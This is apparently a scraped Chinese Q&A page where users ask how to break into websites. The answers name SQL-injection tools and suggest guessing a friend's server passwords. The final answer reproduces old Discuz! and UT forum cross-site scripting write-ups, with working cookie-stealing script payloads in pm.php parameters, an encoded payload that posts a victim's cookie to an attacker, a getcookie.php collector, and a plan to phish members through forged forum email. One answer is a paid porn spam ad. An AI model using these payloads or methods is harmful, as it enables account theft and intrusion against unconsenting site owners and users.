入侵网站是要什么软件
主要是针对不同的漏洞来说的,如果是比较常见的注入漏洞可以使用啊D,或者明小子,以及教主的HDSI等注入工具,如果是其它漏洞则需要相关的漏洞利用工具,比如提权工具等,关于注入漏洞的利用这里有个教程您可以参考下。。http://www.nn4a.com/bbs/read.php?tid=6418toread=1
怎么入侵http://www.7316.com/play/28/这个网站,改变其中的内容啊
国内接触的比较早的牛人,很多并不是开始就搞黑客的,一般之前做做系统维护,搞编程,后来转行研究黑客技术,这样的学出来基本功很好,所以对以后的发展很有好处。
对于现在想学习黑客技术的朋友们,大多内心浮躁,幻想刚学不就就可以入侵网站,盗号什么的,而且在很多新人的心里也只看重这些,殊不知真正的牛人每天都研究系统底层的东西。
如果LZ现在起步的话,对编程什么的一开始没有那么大的激情能啃进去的话,就多看看国内的黑客杂志,初学的适合看《黑客X档案》,里面内容比较通俗易懂,不过要想整本书大半部分都能看懂的话也要看个半年左右才可以,渗透的话可以看《黑客手册》,当你级别高了,对编程有较深的理解,推荐看《黑客防线》,一般没有几年的基础是看不懂黑防的文章的,但是当你可以看懂的时候,对你的技术会提高好几个层次,当你有激情看代码的话,可以先从脚本入手,很多语言有相同的地方,当你精通一门语言,学习其他的语言也更容易理解。
如果LZ觉得我回答可以的话,希望给个最佳答案。
入侵网站或者破解BBS
首先你是个诚实的人
可是破解决不是一件简单的事 当然也没有多么复杂 靠的是智慧 或者更多的是运气。
理论上是可以破解的 实际上也有破解的实例。
但是对于你要看的这个网站 不一定很快就能破解出来
还有 以前我看过这样的网站(也是别人破解的密码),也没有多大意思。
有的论坛还是可以看的 这种东西 偶尔(空虚的时候)看一下
总看就没有劲了。
破解你可以参考一下这里
http://www.yeshack.com/Article/200801/20103.html
你想看的片 赫赫 我这好多的
kama sutra X 爱指南
Better ‘S’‘E’‘X’视频
还有 playboy 系列的片子 playboy 的杂志
绝对震撼 绝对精彩
联系requestebooks@yahoo.com
注:非免费
欢迎交流 交流几个网站还是可以的 :)
如何入侵别人的网站
1.看他是什么的站点了,如果是Html的,那估计悬了,基本上纯静态的网站被黑的可能性很小。
2.如果是动态的,你可以试试“啊D注入工具”,如果可以找到注入点,那么注入就成功了一多半。
3.再不行,你可以运用“社会工程学”来入侵啊。你既然是他朋友,多留心下他习惯的用户名和密码,用这个尝试连接他的服务器(远程或FTP)。
常用的就这几种方法了...如果都不行,说明你道行太浅...多学点东东吧
回复楼主:
如果有BBS也是一个很好的注入点,看看他用的是什么的?如果是动网的...呵呵~~网上动网的漏洞工具多如牛毛。你可以尝试下。
还有就是看看论坛有没有开放上传,对上传文件的限制是什么,,对用户发布信息,有没有script语句过滤,这些都是思路。
其实关键就是认真分析学习的过程,最后祝你成功!
再次回复楼主:
我感觉我给你的都是有效果的建议。因为没有什么方法是入侵网站的万能方法,好的方法是针对网站而言的。你没有提供网站结构,没有网址,我能提供你的只有思路。(最后回复!)
目前动网论坛的漏洞有那些?如何利用这些漏洞入侵动网?
在discuz!的发贴、回贴、PM等中的subject都没有经过过滤,所以也可以添加代码。 例如 http://xxx/post.php?action=newthreadfid=2...cript%3E%3Cb%22 效果是首先弹出自己的cookie 利用方法:把上述代码放置到img中。 适用版本:discuz!2.x discuz!3.x 一种利用discuz!2.0漏洞进行欺骗获得cookie的尝试 通过测试XXXFan论坛的PM功能存在一个安全漏洞,具体描述如下: XXXFan的给某个会员发送悄悄的链接如下(假定这个会员名字为XXXFan) http://XXX/pm.php?action=sendusername=XXXFan 因为论坛程序对会员名字没有进行过滤,而是直接显示在发送到栏目中(TO:),所以可以在名字后面加上script代码。例如 http://XXX/pm.php?action=sendusername=XXXFan "scriptalert(documents.cookie)/scriptb%20" 上面的链接点击以后首先弹出的是自己的cookie内容。 当然我们可以先在自己的站点上构造一个程序来收集cookie,类似于 getcookie.php?cookie= 但是如何来诱使会员点击呢,如果简单的放在论坛上,太容易被识别。所以可以利用discuz论坛程序的另外一个功能,"帖子介绍给朋友"功能。 因为discuz的这个功能对填写的emial地址没有进行任何过滤、辨别和模版,可以伪造任何人给别人发信,安全性很高。利用这个功能我们就可以伪造ExploitFan的管理员给某个会员发一封信,诱使会员点击我们准备的URL,如果诱使就看自己的手段了,例如可以说"论坛正在测试新功能,请您协助点击上面地址,我们会在后台记录您的点击在合适的时间会给您增加积分以做奖励"等等。 因为链接地址是XXXFan的,而且发信人和邮件地址都是XXXFan的官方地址,所以可信度非常高,而且不会留下任何把柄。当然为了更高的安全性,可以在script里的内容加密,以进一步增加隐蔽性。 至于得到cookie如何做,可以尝试cookie欺骗或者是暴力破解MD5密码 本方法适用于大部分使用discuz2.0的论坛,至于discuz3.0的利用方法请参与在我以前发表的discuz!悄悄话漏洞 【BUG】Discuz!投票的BUG 投票可以用 misc.php?action=votepollfid=2tid=16980pollanswers[]=n (n为选项,从0开始) 的方式通过URL来直接投票 但是如果n最大选项呢,嘻嘻~ 照样提交成功,不过增加了一个标题为空的选项 效果见: http://discuz.net/viewthread.php?tid=20020sid=dymPEc (那个最后的空白的是我刚加的) 该漏洞存在的版本: Discuz!3.X Discuz!2.X(可能,没有测试过) Discuz!的代码漏洞 这是接着昨天发现的漏洞所展开的,第一发现者(PK0909)。 具体的描述就不说了,下面是一个简单的测试代码。 /Article/UploadFiles/200412/20041225232318260.gif%22%20style=display:none%3e%3c/img%3e%3cscript%3evar%20Req=new%20ActiveXObject(%22MSXML2.XMLHTTP%22);Req.open(%22post%22,%22 http://www.XXXX.com/forum/pm.php?action=send%22,false);var%20forms=%22pmSubmit=Submit%22.toLowerCase()%2B%22%26msgto=XXXXX%26subject=cookie%26saveoutbox=0%26message=%22%2Bescape(documents.cookie);Req.setRequestHeader(%22Content-length%22,forms.length)%3BReq.setRequestHeader(%22CONTENT-TYPE%22,%22application/x-www-form-urlencoded%22);Req.send(forms);%3c/script%3e%3cb%22 [ /img] 发现discuz!UT 跨域站点的脚本漏洞--短消息篇有关跨域站点的脚本漏洞,已经算是非常平成并普遍的漏洞了。 有关具体的消息可以参阅: http://www.cert.org/advisories/CA-2000-02.html 下面针对Discuz、UT论坛程序的悄悄话部分加以说明 漏洞适应版本: Discuz1.X Discuz!2.0(0609,0820版) Discuz!3.X UT 1.0 漏洞描述: discuz!给指定会员发送悄悄话使用的是类似 http://www.XXXX.net/phpbbs/pm.php?action=sendusername=name 的语句,但是name没有经过过滤直接显示在发送短消息的页面中,这就给偷cookie或者更严重的破坏打开了方便之门。 Discuz!3.X已经改为 http://XXX.net/pm.php?action=senduid=XXXX 类似的语句,避免了这个漏洞,但是在选择短信文件夹的时候却没有经过过滤。同样产生了上面的漏洞 例 http://www.XXXX.net/phpbbs/pm.php?action=s...dusername=name %22%3E%3Cscript%3Ealert(documents.cookie)%3C/script%3E%3Cb%22[/URL] ,上面的例子是显示自己的cookie。(针对Discuz!1.X Discuz!2.X) http://XXX.net/pm.php?folder=inbox%22%3E%3...cript%3E%3Cb%22 显示自己的cookie。(针对Discuz!3.X) UT虽然在主题上经过了过滤,也就是说把%27转换为';但是其收件人却没有过滤,所以同样有类似的漏洞。例子略。(在不同的UT论坛上发现其代码不尽相同,但是总的来说都有类似的漏洞)
希望采纳